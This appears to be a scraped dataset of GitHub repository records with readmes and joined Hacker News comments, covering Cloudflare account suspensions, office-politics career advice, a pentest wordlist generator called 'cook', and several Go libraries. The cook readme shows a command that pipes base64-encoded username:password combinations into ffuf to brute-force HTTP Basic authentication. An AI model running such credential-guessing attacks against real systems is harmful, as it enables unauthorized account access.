Did Cloudflare issue any formal communication with you warning about usage and how it violates contractual terms, or did they \"ban\" you out of nowhere?The comments here have mainly focused on the issue of instant suspension - which is obviously deeply concerning - but I also feel like there is a huge issue at Cloudflare regarding their Enterprise pricing model.Cloudflare's sales team and Enterprise pricing model are one of the least effective sales organisations I have encountered in this space. Given the technical nature of their product, it's extremely hard to explain even basic uses of the tool and things like Workers are near impossible to discuss with them. I was really unsurprised to see that OP had a failed Enterprise negotiation with them as I have had the exact same conversation at three different companies now and can imagine perfectly what you were told.The current offerings of Enterprise and Enterprise Lite simply do not map to the reality of how people use the tool and scale businesses on top of it. I think in part due to Cloudflare's history essentially selling bandwidth and caching, the model is fixated on high binary traffic workloads and simply cannot comprehend the SaaS service model that runs on it and tools like Workers.This is mostly a rant and hopefully a small +1 signal that this area needs major improvement - but I would also love to hear if anyone else has had interactions with Cloudflare Enterprise and how they found that process?(Disclaimer: I'm a massive fan of Cloudflare, a user of their products and hold their stock)\"The large print giveth, the small print taketh away\" has never been more true than with Cloudflare.None of Cloudflare's marketing or technical documentation makes any explicit reference to \"permitted usages\" for Cloudflare services such as R2 and Workers.This page for example means one thing without any reference to permitted usages and would mean something entirely different if the permitted usages were promoted with the same level of visibility as the benefits.https://www.cloudflare.com/products/r2/Nothing here tells me I cannot write my own video serving code with Workers:https://workers.cloudflare.com/You might even believe \"whatever you need\" from this paragraph from the above link:\"Static assets with dynamic power. Say goodbye to build steps which pre-generate thousands of assets in advance. 
Harness the unrivaled raw power of the edge to generate images, SVGs, PDFs, whatever you need, on the fly, and deliver them to users as quickly as a static asset.\"This developer documentation would takes on an entirely new meaning if a link to \"acceptable uses\" was prominent at the top of each page (not fine print).https://developers.cloudflare.com/r2/get-started/https://developers.cloudflare.com/r2/data-access/workers-api...https://developers.cloudflare.com/r2/examples/demo-worker/Have built an entire application around assuming there were no such limitations I now need to rebuild elsewhere.Humph.I now no longer even understand what \"no egress fees\" means - in a way that's worse than the big cloud providers where at least you know they are charging you 9 cents per gigabyte.Very similar to this other one https://news.ycombinator.com/item?id=34235237I just repost the same comment I put in the above thread> The thing that scary me most is that his business get shut down without any notice period (at least the author not mentioning any previous communications from Cloudflare team about the issue).> This is really a shitty thing from Cloudflare, you cannot shut down an already running business without any notice/grace period.Are there no laws around account removal/shutdown? In the future I will be actively asking service providers their procedures on account shutdown.What even is the restriction on returning JSON? One of the examples is explicitly how to return JSONhttps://developers.cloudflare.com/workers/examples/return-js...From the terms> 2.8 Limitation on Serving Non-HTML Content> The Services are offered primarily as a platform to cache and serve web pages and websites. Unless explicitly included as part of a Paid Service purchased by you, you agree to use the Services solely for the purpose of (i) serving web pages as viewed through a web browser or other functionally equivalent applications, including rendering Hypertext Markup Language (HTML) *or other functional equivalents, and (ii) serving web APIs subject to the restrictions set forth in this Section 2.8*. Use of the Services for serving video or a disproportionate percentage of pictures, audio files, or other non-HTML content is prohibited, unless purchased separately as part of a Paid Service *or expressly allowed under our Supplemental Terms for a specific Service*. If we determine you have breached this Section 2.8, we may immediately suspend or restrict your use of the Services, or limit End User access to certain of your resources through the Services.Supplemental terms> The Cloudflare Developer Platform consists of the following Services: (i) *Cloudflare Workers*, a Service that permits developers to deploy and run encapsulated versions of their proprietary software source code (each a \u201cWorkers Script\u201d) on Cloudflare\u2019s edge servers; (ii) Cloudflare Pages, a JAMstack platform for frontend developers to collaborate and deploy websites; (iii) Cloudflare Queues, a managed message queuing service; and (iv) Workers KV, Durable Objects, and R2, storage offerings *used to serve HTML and non-HTML content.*I can't quite figure out how to parse this such that workers would be deemed unusable to just run an API.I'd absolutely have gone ahead with using it for an API.Just imagine how many people that this happens to who don't know enough to post online on a forum that lots of people read.For the CloudFlare people here, this is an upsell opportunity that's being missed. 
The whole point of the cheap plan is to hook people so they move up. But if you cut them off you can't move them up, duh. You need to rework the sales pipeline for this scenario, obviously.[flagged]I stopped paying for cloudflare after their support team was unable to debug why one of my rewrite conditions wasn't working. I provided them full details like for kindergarden, but they replied after days saying it's working on their end, lol. I deeply respect the cloudflare tech and the dev team, but support sucks and i don't trust cloudflare anymore. I won't pay even a single cent, even if they would have stellar support from now on. After reading all these cloudflare stories lately, and knowing how they treated me, i don't care about them anymore. Someone should write a \"you probably dont need cloudflare\" article. I'm disgusted by these kind of companies that grow large and they stop caring for the people who were there with them from day 1.[flagged]> when I got approached by Cloudflare sales team I explicitly asked if I can still be on pay as you go/self server model and reply was:Never entirely trust what is said to you to secure/continue a sale, unless you have it written in a contract.> \u2026 \"Enterprise wise, that's up to you and you could likely get away with utilising self-serve as you go\u2026 especially if what sales say to you is couched in vague works like \u201clikely to get away with\u201d.i feel like this is a repeating theme, and i've seen it at a company i was at.in my view, the root of the problem is that companies don't have usage limits in place.they often have 'sort of' usage limits in place -- that is, they don't actually have metrics for their customers' usage, and that leads to these situations.and these situations are insane resource hogs -- teams of people spending days to try to figure out whether some customer should be bumped up to the next level.it doesn't happen, then the customer gets cut off.pretty messed up for Cloudflare to try and destroy a company like that for no reason.we get these wishy-washy usage/support/sales situations with a lot of ambigous back and forth, and BIGCOMPANY trying to kill _littlecompany_, etc.set usage limits, when they're surpassed, move the customer to the higher tier, done.plenty more you can do around the edges, like grace periods, etc. etc., but i feel like this is amateur hour and cruel indifference - in this case, from Cloudflare -- and not the first time we've seen indifference from them, and other BIGTECH companies.[flagged]Cloudflare support is complete garbage.We upgraded to Enterprise, and had some issues because CF's documentation was not clear (literally a blog post), and their support took many days to even respond and then their response made it clear they hadn't even read the ticket.I'd move everything into AWS in a second if moving DNS wasn't such a pain.Also am forced to use the global api token because constantly get rate limited using permission-scoped api tokens -- this is from a simple Terraform plan (first thing in the morning) and after them increasing my rate limit to the max.I'm very interested in this. 
I also have clients with very large usage volumes on CFCloudflare has non-transparent pricing, unlike AWS, which will charge you for every thing with detailed usage tracking.When ever there is non-transparent pricing, it's scary to try and use an infrastructure related service.The sales teams can't go around saying that you are not a profitable customer, and they can't argue with the marketing team to be more honest about pricing on the pricing page.So, end result, let's bump of these small free loaders. Large enterprise deals is what gets us the bonus anyways.I like fly.io pricing in that sense. And I am sure there might be others offering a more transparent pricing, otherwise like me still stuck on AWS.Welcome to Google I mean Twitter I mean Facebook I mean cloudflare support.I really curious about how this unfolds, I was planning to migrate from AWS Lambda to Cloudflare Workers. And we have LOTs of Json, and APIs. Why would they cancel paying Workers customers?Since \"there is no such thing as bad publicity\":- Is that a good way to get cheap \"influencers\"?- Are there companies helping you measuring the potential \"outreach\" of your customers in case you piss them off?OP, any updates?i'm about to move a significant amount of traffic to cloudflare. holding off until i see how this is handled. Can you please update this to reflect the total time of service outage and time to resolve. As a busy tech company, this is an unneeded problem. We pay cloudflare to be fast. Not make our sites slow and unresponsive.How are you using the workers? Is the JSON cached? Where do you get the JSON?Around 12:00 UTC today ban has been lifted for my account thanks to @jgrahamc - thanks!> Small SaaS\n> 4 billions requests & 1PB of data per monthPick one!Looking at this with interest as I've multiple projects on cloudflare now and in development.Well this isn\u2019t good. I\u2019m leading an effort to move some of our services and about a hundred domains over to Cloudflare.Given all of this I think we\u2019re going to have to push pause and see how this shakes out.I recently signed up to CloudFlare for their Yubi key deal that was still being advertised on their website. A week later I received an email saying only customers subscribed by a certain time could claim the offer.I asked them to delete my data or provide the Yubi offer and they did neither. So they sit in an email folder known as bad companies. Because my data has value and they lied to obtain it for their own gain (aka fraud).In Canada we have private prosecution/rules about falsely acquired data. Every bad story on HN puts me closer to opening that folder up and ensuring my data costs at least 100k.Enough is enough.I am pretty amazingly sure it is because of \"office politics.\" It's more than being a \"brown-noser.\"Probably 95% of people go into companies with zero idea of office politics. I sure didn't when I started.What I have found is that people either 1) say that they hate office politics so they ignore it, 2) they pick the wrong \"friends\"The first reasons is obvious why people don't get promoted.The second reason is that people look at work as an extension of their social life, instead of as a job. I'll go into this.One has to realize that a job is not for friendship, it is for work. If you had a billion dollars, you wouldn't even be in that job in the first place in order to make \"friends.\" Because it's a fucking job. 
Everyone you meet should be \"business associates.\" Now, I know someone is going to say, \"Yeah, but I met my best friend of 20 years at my first job.\" Every time. Well, all I can say is that this is NOT about you. So what if you did. I didn't. Many others don't. Again, this is about getting promotions, not about making friends. Make friends outside of work. It's just as easy. I don't care about how you make friends at work. It's immaterial. I'm trying to relate how to get promoted at a job and not talk about your social life. If you want to discuss that, let's start another completely different conversation on reddit or something.Probably the biggest mistake that many people starting a job will go into the job and the first person who comes up to them and is friendly is now a \"friend.\" And they get into that \"clique.\"What one should do is not to become \"friends\" with the first person friendly to them. I'm not saying you shouldn't be friendly to all, it is very important that one is friendly to everyone. No gossip, no backstabbing, none of that evil shit.So when you start a new job, look around. Figure shit out. Find out who the \"power-players\" are. This is not difficult if you are aware.Once you figure that out, then you develop deeper business relationships with those people, just like you would anyone else. You want visibility with them for long-term success.I've done this many times and have been plucked from obscurity. You start rising through the company fast, because first, everyone knows you are associated closely with powerful people and nobody wants to fuck with you, they want to be nice because they want you to say nice things about them to powerful people in the business. And if you get along with the powerful person, that person will start telling other powerful people about \"keep an eye on this person\" kinda shit, and they all become aware of you. It's how it works. It truly is.Now, if you piss off a powerful person at the start, probably can expect your career will be less than ideal at that company.As far as your immediate boss goes, you have to know exactly what they want and get it done. If they change your priorities every week, and you don't like that, too bad. You do what they say. End of story, your personal preferences are not important. The #1 goal is to get promoted out of there anyways, so it is just a temporary thing anyways. So that part of office politics \"brown-nosing\" is correct, but it is just one tactic in the overall goal, and a minor tactic at that.Another super tactic is to write and public speak. If you do this, you become an \"industry expert.\" It doesn't matter if you speak on arcane shit in your industry, or basic stuff, it is unimportant. The important part is to write and speak to the public. I know one guy that does public speaking a few times a week - to small and large groups. It doesn't matter.One time I spoke at a small group of 25 people in an obscure technical conference. As a speaker, everyone wants to talk to you after your talk and the meeting - it's almost always that way. Well, I was talking to some people, then at lunch I struck up a conversation and talking a while to some dude I didn't know. Well, he tells me he's like to talk some more later in a few weeks and to call him. He gave me his card and he was the CIO of a Fortune 500 company and I talked to him a little about it and he is at the head of a 10,000 person tech group. 
I asked him why he flew out for this small meeting and he said he was close with one of the other speakers there and so was going to hang out with him afterwards or something like that, I forget exactly.That was an anomoly and in no way did I expect it, but the point is that just by giving a public talks, you gain so much credibility. Same with publishing in some kind of online or offline publication/media in your industry. If you're in supply chain management and publish some article on supply chain management, your immediate boss and also the COO of the company will know, because 1, you let them know, and 2 - you publish and speak a lot so it is difficult to ignore and they will know you are an \"up and comer.\" You are an industry expert. Your public persona will rub off on your boss, the COO, and the company.Also, another byproduct of public speaking and public writing means you will always have job offers coming out your ass, no matter what field. The one guy I knew who did two speaking engagements a week got 3-5 job offers daily. He showed me the emails.I know everyone can understand what I wrote. And it is a template to success. I've used it many times and know it is true..The issue that most people have is the \"small talk\" part. There is a solution to that. The solution is just the exact same as anything else you've done in your life. If you are a programmer, you didn't pop out of your mother's womb writing code. You might joke that someone has, but in seriousness, nobody is born with all knowledge - it takes effort to learn.So in order to learn how to make small talk and to get along with people, one has to work at it, same as if a CPA had to learn double-entry accounting in university. Like a physician has to go to med school.If you don't want to do it because you hate it, then so be it. But if you want to get promoted, you best learn how to be social and communicative.There's a shitload of resources now that I didn't dream of when I started my career.https://www.youtube.com/results?search_query=how+do+i+make+s...https://www.youtube.com/results?search_query=how+do+i+not+be...https://duckduckgo.com/?q=how+do+i+play+office+politics&atb=...https://www.youtube.com/results?search_query=how+to+strike+u...https://duckduckgo.com/?q=how+do+i+make+small+talk&atb=v314-...https://duckduckgo.com/?q=how+do+i+not+be+socially+awkward&a...https://www.youtube.com/results?search_query=how+do+i+play+o...https://duckduckgo.com/?q=how+to+strike+up+a+conversation+wi....Don't just watch one or two videos and read one or two articles. Make a study out of it. Put as much time into it as you did whatever your occupation is.There are many techniques. Some will work for you, some won't. Write down those that you think will work. Do them, test them. You don't even have to do them at work. You can practice conversation techniques with your grocery store clerk, with the admitting person at your doctor's office, with anyone. Don't randomly talk, use the techniques and test them over and over. None should be by the seat of your pants conversations. It's the same with anything - learn programming the first time - you have to learn what a variable is, what a iteration/loop is. And do them over and over so that they are second nature. You don't just randomly write miscellaneous computer lines. There's a plan. One specific line of code has to come after another line of code.And again, you for sure don't have to be an asshole. I am always smiling and friendly to everyone, and sincerely so. 
I've always liked everyone where I work and think everyone has liked me. Sure, there's sometimes been a bit of friction, but because I'm nice all the time to everyone, and develop that reputation, they know it is not me just being a dick for being a dick's sake.All of the above has to do with larger companies - a few hundred or more people. If you're in a startup with 5 people, of course all of the above doesn't apply, which I think is self-evident. You know everyone.And, also, if you don't want to be promoted and want to just do what you do best, well this whole converation is pointless for you to read or comment on. It is for people who DO want to get promoted and rise in their company.\"Some people don't want to get promoted because it might be too much work.\"I wonder if this is really just the key reason here. Perhaps everything else here just revolves around that. e.g. people being defensive with feedback and not analyzing perf reviews because they don't actually want to grow.It's also worth contrasting internal promotion challenges with the silicon valley way - see recent HN article \"All start-ups are an act of desperation.\" If you have a better mouse trap, make it yourself and parlay it into getting your own team at the company or run it yourself. I see no need to wait around for corporate nonsense.The main reason you're not getting promoted is because it would cost the company money.A secondary reason is that promotions are usually at odds with maintaining your boss's position in the status hierarchy.> Maybe you're doing enough for your role. You need to take on more challenges and go above and beyond to get promoted\"Do extra work for free hoping you will be rewarded later.\"A workplace where you have to play the above games to get promoted... sounds like a workplace best avoided. To me, anyway.... Apparently many people enjoy such environments, or so they claim... or at least they get paid lots for putting up with it.I would say \"honesty is the best policy\" you should always talk to your boss and check if your wishes and capabilities/experience are aligned.Is there a tech analogy to be made?i forgot to mention but i also wrote a bash scriptYour sales pitch at the end made this truly a hackernews post. You've certainly learned a lot!I can't claim to be the representative of HN. However, you're welcome and thank you for sharing your joy. It reminds me of my own joy.Free software underpins much of your experience. Given your background, you may find it interesting to read about it: https://archive.org/details/free-software-free-society-selec...I'm also self-taught from another discipline. I'm a bottom-up learner and have found 'The Elements of Computing Systems' (aka Nand2Teris) compelling and exciting. With the course, you build a computer, completely, from scratch. It's some of the best writing and teaching I have ever experienced. It leaves you with a solid overview of computing and where you can go next with your learning, career, or projects. https://www.nand2tetris.org/You might think of these as the \"why\" and the \"how\".Hi,Just a small tip:Yes, configuring email and having your own email server can be a bit of a pain in the ass. But this might save you some money and do it all yourself while being pretty secure:1> Figure out how to use Docker / containerization on your VPS.2> Install Mailcow (https://mailcow.email/) on your VPS following these (https://docs.mailcow.email/) instructions. 
With a maximum of a few hours tinkering (depending on your requirements) you are pretty much done.Happy Christmas, and never stop learning :)", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "glitchedgitz/cook", "link": "https://github.com/glitchedgitz/cook", "tags": ["wordlist-generator", "password-generator", "advance-permutation", "wordlists", "predefined-sets", "pentest-tools", "bugbounty-tool"], "stars": 532, "description": "An overpower wordlist generator, splitter, merger, finder, saver, create words permutation and combinations, apply different encoding/decoding and everything you need. Frustation Killer!!!", "lang": "Go", "repo_lang": "", "readme": "\n\n# COOK\nAn overpower wordlist generator, splitter, merger, finder, saver, create words permutation and combinations, apply different encoding/decoding and everything you need. \n\nFrustration killer! & Customizable!\n\n### Customizable\nCook is highly customizable and it depends on\n[cook-ingredients](https://github.com/glitchedgitz/cook-ingredients). Cook Ingredients consists YAML Collection of word-sets, extensions, funcitons to generate pattern and wordlists.\n\n### Installation\nUse Go or download [latest builds](https://github.com/glitchedgitz/cook/releases/) \n```\ngo install -v github.com/glitchedgitz/cook/v2/cmd/cook@latest\n```\n\n> After installation, run `cook` for one time, it will download [cook-ingredients](https://github.com/glitchedgitz/cook-ingredients) automatically at `%USERPROFILE%/cook-ingredients` for windows and `$home/cook-ingredients` for linux.\n\n# Basic\nWithout basics, everything is useless.\n\n\n## Parametric Approach\nYou can define your own params and use them to generate the pattern. This will be useful once you understand [methods](#methods)\n\n\n# Save wordlists and word sets\n\n\n### Search Wordlist\n```\ncook search keyword\n```\n\n## Reading File using Cook\nIf you want to use a file from current working directory. \nUse `:` after param name. \n```\ncook -f: live.txt f\n```\n\n# Methods\nMethods will let you apply diffenent sets of operation on final output or particular column as you want. You can encode, decode, reverse, split, sort, extract different part of urls and much more...\n\n- `-m/-method` to apply methods on the final output\n- `-mc/-methodcol` to apply column-wise.\n- `param.methodname` apply to any parameter-wise, will example this param thing later.\n- `param.md5.b64e` apply multiple methods, this will first md5 hash the value and then base64 encode the hashed value.\n\n\n\n\n
All methods\n\n```\nMETHODS\n Apply different sets of operations to your wordlists\n\nSTRING/LIST/JSON\n sort - Sort them\n sortu - Sort them with unique values only\n reverse - Reverse string\n split - split[char]\n splitindex - splitindex[char:index]\n replace - Replace All replace[this:tothis]\n leet - a->4, b->8, e->3 ...\n leet[0] or leet[1]\n json - Extract JSON field\n json[key] or json[key:subkey:sub-subkey]\n smart - Separate words with naming convensions\n redirectUri, redirect_uri, redirect-uri -> [redirect, uri]\n smartjoin - This will split the words from naming convensions &\n param.smartjoin[c,_] (case, join)\n redirect-uri, redirectUri, redirect_uri -> redirect_Uri\n\n u upper - Uppercase\n l lower - Lowercase\n t title - Titlecase\n\nURLS\n fb filebase - Extract filename from path or url\n s scheme - Extract http, https, gohper, ws, etc. from URL\n user - Extract username from url\n pass - Extract password from url\n h host - Extract host from url\n p port - Extract port from url\n ph path - Extract path from url\n f fragment - Extract fragment from url\n q query - Extract whole query from url\n k keys - Extract keys from url\n v values - Extract values from url\n d domain - Extract domain from url\n tld - Extract tld from url\n alldir - Extract all dirrectories from url's path\n sub subdomain - Extract subdomain from url\n allsubs - Extract subdomain from url\n\nENCODERS\n b64e b64encode - Base64 encoder\n hexe hexencode - Hex string encoder\n charcode - Give charcode encoding\n charcode[0] without semicolon\n charcode[1] with semicolon\n jsone jsonescape - JSON escape\n urle urlencode - URL encode reserved characters\n utf16 - UTF-16 encoder (Little Endian)\n utf16be - UTF-16 encoder (Big Endian)\n xmle xmlescape - XML escape\n urleall urlencodeall - URL encode all characters\n unicodee unicodeencodeall - Unicode escape string encode (all characters)\n\nDECODERS\n b64d b64decode - Base64 decoder\n hexd hexdecode - Hex string decoder\n jsonu jsonunescape - JSON unescape\n unicoded unicodedecode - Unicode escape string decode\n urld urldecode - URL decode\n xmlu xmlunescape - XML unescape\n\nHASHES\n md5 - MD5 sum\n sha1 - SHA1 checksum\n sha224 - SHA224 checksum\n sha256 - SHA256 checksum\n sha384 - SHA384 checksum\n sha512 - SHA512 checksum\n \n```\n
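As another hypothetical example, combining the URL helpers listed above with the documented `:` file-input syntax and `param.method` chaining, extracting sorted unique domains from a file of URLs might look like:\n\n```\ncook -u: urls.txt u.domain.sortu\n```\n\n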
\n\n## Multiple Methods\nYou can apply multiple sets of operations to a particular column or to the final output in one command, so you don't have to re-run the tool again and again.\n\nTo understand the usage, suppose you read a blog post, for example this one: https://blog.assetnote.io/2020/09/18/finding-hidden-files-folders-iis-bigquery/.\n\n```\ncook -z shub_zip_files z.json[path].fb.sortu.smartjoin[c:_]\n```\n\n\n\n# Direct fuzzing with FFUF\nYou can use the generated output from cook directly with [ffuf](https://github.com/ffuf/ffuf) using a pipe\n\n```\ncook usernames_list : passwords_list -m b64e | ffuf -u https://target.com -w - -H \"Authorization: Basic FUZZ\"\n```\n\nSimilarly, you can fuzz directories/headers/params/numeric ids... and apply the required algorithms to your payloads.\n\n# Functions\n```\ncook -dob date[17,Sep,1994] elliot _,-, dob\n```\n\n\n> Customize: \n Create your own functions in `cook-ingredients/my.yaml` under functions:\n\n# Parsing Rules\n| Rule | Description |\n|---|---|\n|Columns| Separated by space |\n|Values| Separated by comma |\n|Params| You can give a param any name; use `-` before a name to make it a param: `-param value` |\n|Raw Strings| Use ` before and after the string to stop cook's parsing. Useful when you need to use any keyword as a word. |\n|Pipe Input| Take pipe input using `-` as the value of any param. |\n|File Input| Use `:` after the param name to take file input. `cook -f: live.txt f`|\n|Functions | Can be called using params only. |\n|Methods | Can be used on params or on the final output |\n\n# Flags\n| Flag | Usage |\n|---|---|\n|-a, -append| Append to the previous lines, instead of permutations |\n|-c, -col| Print column numbers and their values |\n|-conf, -config| Config information |\n|-mc, -methodcol| Apply methods column wise `-mc 0:md5,b64e; 1:reverse`
To apply the same methods to all columns, use `-mc md5,b64e` |\n|-m, -method| Apply methods to the final output |\n|-h, -help| Help |\n|-min | Minimum number of columns to print |\n\n### -append\nAppends line by line, so use it if you want to merge two lists line by line. As always, you can append multiple columns using the column syntax.\n \n\n### -min\n\n\n# Ranges\nSomething useful...\n\n\n# Repeat Operator\nYou can repeat a string horizontally or vertically.\n- Use `*` for horizontal repeating.\n- Use `**` for vertical repeating.\n- And try this `*10-1` or this `*1-10`.\n- Create Null Payloads and directly fuzz with ffuf. `cook **100 | ffuf ...`\n\n\n\n\n# Breaking Changes in version v2.x.x\nVersion 1.6 and Version 2 have significant breaking changes to improve the usability of the tool.\n\n- Previously columns were separated with a colon. Now they are separated by a space\n- Single cook.yaml file removed. Now there is a folder.\n- URL support for yaml files and added sources with over 5500 wordlist sets.\n- File regex removed, now use the .regex[] method for regex\n- Taking file input needs a colon after the param\n- -case flag removed, now you can use upper, lower and title\n- Added Methods\n- Removed charset and extensions, now they are in lists\n- Simplified ranges\n\n# Contribute\n- Add wordlists, wordsets, functions, ports and other things in [cook-ingredients](https://github.com/glitchedgitz/cook-ingredients)\n- Make **raw string** work the way it works in programming languages, i.e. a better parser.\n- I don't know, you might use your creativity and add some awesome features.\nOr you can [buy me a coffee](https://www.buymeacoffee.com/glitchedgitz)\u2615\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "campoy/go-web-workshop", "link": "https://github.com/campoy/go-web-workshop", "tags": ["golang", "appengine", "appengine-go", "workshop", "backend"], "stars": 532, "description": "Build Web Applications with Go on App Engine", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/campoy/go-web-workshop.svg)](https://travis-ci.org/campoy/go-web-workshop) [![Go Report Card](https://goreportcard.com/badge/github.com/campoy/go-web-workshop)](https://goreportcard.com/report/github.com/campoy/go-web-workshop)\n\n# Building Web Applications with Go\n\nWelcome, gopher! You're not a gopher?\nWell, this workshop is for gophers, or people that use the [Go programming language][1].\nBut fear not if you've never written any Go before!\nI'd recommend you learn the basics of the language first with the [Go tour][2].\n\nThis workshop has been run a couple of times with an instructor leading. The goal of\nthis repo is to make it as easy as possible for individuals to follow the content\nby themselves. If you get stuck at any point, feel free to file issues asking questions.\n\n## Setting up your workspace\n\nTo go through this you will need the following:\n\n1. You have installed the [Go Programming Language][1].\n1. You have set up a `GOPATH` by following the [How to Write Go Code][9] tutorial.\n1. You are somewhat familiar with the basics of Go. (The [Go Tour][2] is a pretty good place to start)\n1. 
You have a Google account and you have installed the [Google Cloud SDK][3].\n\n## Contents\n\nThere's a lot to say about how to build web applications, in Go or any other language.\nBut we only have one day so we won't try to cover too much.\nInstead we'll cover the basics, so you'll be able to explore other solutions and frameworks later.\n\nThe workshops is divided in eleven sections:\n\n- [0: Hello world](section00/README.md)\n- [1: Web Clients](section01/README.md)\n- [2: Web servers](section02/README.md)\n- [3: Input validation and status codes](section03/README.md)\n- [4: Deploying to App Engine](section04/README.md)\n- [5: Hello, HTML](section05/README.md)\n- [6: JSON encoding and decoding](section06/README.md)\n- [7: Durable storage with Cloud Datastore](section07/README.md)\n- [8: Retrieving remote resources with urlfetch](section08/README.md)\n- [9: What is Memcache and how to use it from App Engine](section09/README.md)\n- [10: Congratulations!](section10/README.md)\n\n## Resources\n\nThese are places where you can find more information for Go:\n\n- [golang.org](https://golang.org)\n- [godoc.org](https://godoc.org), where you can find the documentation for any package.\n- [The Go Programming Language Blog](https://blog.golang.org)\n\nMy favorite aspect of Go is its community, and you are now part of it too. Welcome!\n\nAs a newcomer to the Go community you might have questions or get blocked at some point.\nThis is completely normal, and we're here to help you.\nSome of the places where gophers tend to hang out are:\n\n- [The Go Forum](https://forum.golangbridge.org/)\n- #go-nuts IRC channel at [Freenode](https://freenode.net/)\n- Gophers\u2019 community on [Slack](https://gophers.slack.com/messages/general/) (signup [here](https://invite.slack.golangbridge.org/) for an account).\n- [@golang](https://twitter.com/golang) and [#golang](https://twitter.com/search?q=%23golang) on Twitter.\n- [Go+ community](https://plus.google.com/u/1/communities/114112804251407510571) on Google Plus.\n- [Go user meetups](https://go-meetups.appspot.com/)\n- golang-nuts [mailing list](https://groups.google.com/forum/?fromgroups#!forum/golang-nuts)\n- Go community [Wiki](https://github.com/golang/go/wiki)\n\n### Disclaimer\n\nThis is not an official Google product (experimental or otherwise), it is just\ncode that happens to be owned by Google.\n\n[1]: https://golang.org\n[2]: https://tour.golang.org\n[3]: https://cloud.google.com/sdk/downloads\n[9]: https://golang.org/doc/code.html#Organization\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "RussellLuo/timingwheel", "link": "https://github.com/RussellLuo/timingwheel", "tags": ["go", "timer"], "stars": 532, "description": "Golang implementation of Hierarchical Timing Wheels.", "lang": "Go", "repo_lang": "", "readme": "# timingwheel\n\nGolang implementation of Hierarchical Timing Wheels.\n\n\n## Installation\n\n```bash\n$ go get -u github.com/RussellLuo/timingwheel\n```\n\n\n## Design\n\n`timingwheel` is ported from Kafka's [purgatory][1], which is designed based on [Hierarchical Timing Wheels][2].\n\n\u4e2d\u6587\u535a\u5ba2\uff1a[\u5c42\u7ea7\u65f6\u95f4\u8f6e\u7684 Golang \u5b9e\u73b0][3]\u3002\n\n\n## Documentation\n\nFor usage and examples see the [Godoc][4].\n\n\n## Benchmark\n\n```\n$ go test -bench=. 
-benchmem\ngoos: darwin\ngoarch: amd64\npkg: github.com/RussellLuo/timingwheel\nBenchmarkTimingWheel_StartStop/N-1m-8 5000000 329 ns/op 83 B/op 2 allocs/op\nBenchmarkTimingWheel_StartStop/N-5m-8 5000000 363 ns/op 95 B/op 2 allocs/op\nBenchmarkTimingWheel_StartStop/N-10m-8 5000000 440 ns/op 37 B/op 1 allocs/op\nBenchmarkStandardTimer_StartStop/N-1m-8 10000000 199 ns/op 64 B/op 1 allocs/op\nBenchmarkStandardTimer_StartStop/N-5m-8 2000000 644 ns/op 64 B/op 1 allocs/op\nBenchmarkStandardTimer_StartStop/N-10m-8 500000 2434 ns/op 64 B/op 1 allocs/op\nPASS\nok github.com/RussellLuo/timingwheel 116.977s\n```\n\n\n## License\n\n[MIT][5]\n\n\n[1]: https://www.confluent.io/blog/apache-kafka-purgatory-hierarchical-timing-wheels/\n[2]: http://www.cs.columbia.edu/~nahum/w6998/papers/ton97-timing-wheels.pdf\n[3]: http://russellluo.com/2018/10/golang-implementation-of-hierarchical-timing-wheels.html\n[4]: https://godoc.org/github.com/RussellLuo/timingwheel\n[5]: http://opensource.org/licenses/MIT\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "quii/mockingjay-server", "link": "https://github.com/quii/mockingjay-server", "tags": [], "stars": 532, "description": "Fake server, Consumer Driven Contracts and help with testing performance from one configuration file with zero system dependencies and no coding whatsoever", "lang": "Go", "repo_lang": "", "readme": "# mockingjay server\n\n[![Build Status](https://travis-ci.org/quii/mockingjay-server.svg?branch=master)](https://travis-ci.org/quii/mockingjay-server)[![Coverage Status](https://coveralls.io/repos/quii/mockingjay-server/badge.svg?branch=master)](https://coveralls.io/r/quii/mockingjay-server?branch=master)[![GoDoc](https://godoc.org/github.com/quii/mockingjay-server?status.svg)](https://godoc.org/github.com/quii/mockingjay-server)\n\n![mj example](http://i.imgur.com/ZtI1Q39.gif)\n\nMockingjay lets you define the contract between a consumer and producer and with just a configuration file you get:\n\n- A fast to launch fake server for your integration tests\n - Configurable to simulate the eratic nature of calling other services\n- [Consumer driven contracts (CDCs)](http://martinfowler.com/articles/consumerDrivenContracts.html) to run against your real downstream services.\n\n**Mockingjay makes it really easy to check your HTTP integration points**. 
It's fast, requires no coding and is better than other solutions because it will ensure your mock servers and real integration points are consistent so that you never have a green build but failing software.\n\n- [Installation](https://github.com/quii/mockingjay-server/wiki/Installing) - [Download a binary](https://github.com/quii/mockingjay-server/releases/latest), [use a Docker image](https://hub.docker.com/r/quii/mockingjay-server/) or `go get`\n- [Rationale](https://github.com/quii/mockingjay-server/wiki/Rationale)\n- [See how mockingjay can easily fit into your workflow to make integration testing really easy and robust](https://github.com/quii/mockingjay-server/wiki/Suggested-workflow)\n\n\n## Running a fake server\n\n````yaml\n---\n - name: My very important integration point\n request:\n uri: /hello\n method: POST\n body: \"Chris\" # * matches any body\n response:\n code: 200\n body: '{\"message\": \"hello, Chris\"}' # * matches any body\n headers:\n content-type: application/json\n\n# define as many as you need...\n````\n\n````bash\n$ mockingjay-server -config=example.yaml -port=1234 &\n2015/04/13 14:27:54 Serving 3 endpoints defined from example.yaml on port 1234\n$ curl http://localhost:1234/hello\n{\"message\": \"hello, world\"}\n````\n\n## Check configuration is compatible with a real server\n\n````bash\n$ mockingjay-server -config=example.yaml -realURL=http://some-real-api.com\n2015/04/13 21:06:06 Test endpoint (GET /hello) is incompatible with http://some-real-api - Couldn't reach real server\n2015/04/13 21:06:06 Test endpoint 2 (DELETE /world) is incompatible with http://some-real-api - Couldn't reach real server\n2015/04/13 21:06:06 Failing endpoint (POST /card) is incompatible with http://some-real-api - Couldn't reach real server\n2015/04/13 21:06:06 At least one endpoint was incompatible with the real URL supplied\n````\nThis ensures your integration test is working against a *reliable* fake.\n\n### Inspect what requests mockingjay has received\n\n http://{mockingjayhost}:{port}/requests\n\nCalling this will return you a JSON list of requests\n\n## Make your fake server flaky\n\nMockingjay has an annoying friend, a monkey. Given a monkey configuration you can make your fake service misbehave. 
